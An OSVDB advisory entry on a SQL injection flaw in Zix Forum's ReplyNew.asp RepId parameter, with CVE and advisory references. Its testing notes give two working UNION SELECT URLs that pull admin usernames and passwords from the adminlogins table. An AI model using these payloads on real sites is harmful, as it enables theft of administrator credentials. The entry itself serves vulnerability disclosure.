Zix Forum ReplyNew.asp RepId Variable SQL Injection

2006-09-05T06:48:53
ID OSVDB:28569
Type osvdb
Reporter OSVDB
Modified 2006-09-05T06:48:53

Description

Manual Testing Notes

http://[target]/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins

http://[target]/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins

References:

Secunia Advisory ID: 21766

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0045.html

FrSIRT Advisory: ADV-2006-3476

CVE-2006-4612

Bugtraq ID: 19855